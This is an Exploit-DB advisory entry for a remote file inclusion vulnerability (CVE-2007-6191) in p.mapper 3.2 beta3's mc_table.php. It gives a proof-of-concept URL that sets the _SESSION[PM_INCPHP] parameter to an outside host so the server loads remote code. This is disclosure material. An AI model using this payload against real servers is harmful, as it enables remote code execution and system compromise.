p.mapper 3.2 beta3 - plugins/export/mc_table.php _SESSIONPM_INCPHP Parameter Remote File Inclusion

2007-11-27T00:00:00
ID EDB-ID:30821
Type exploitdb
Reporter ShAy6oOoN
Modified 2007-11-27T00:00:00

Description

p.mapper 3.2 beta3 plugins/export/mc_table.php _SESSION[PM_INCPHP] Parameter Remote File Inclusion. CVE-2007-6191. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/26614/info
 
p.mapper is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
 
These issues affect p.mapper 3.2.0 beta3; other versions may also be vulnerable.
 
http://www.example.com/pmapper-3.2-beta3/plugins/export/mc_table.php?_SESSION[PM_INCPHP]=http://www.example2.com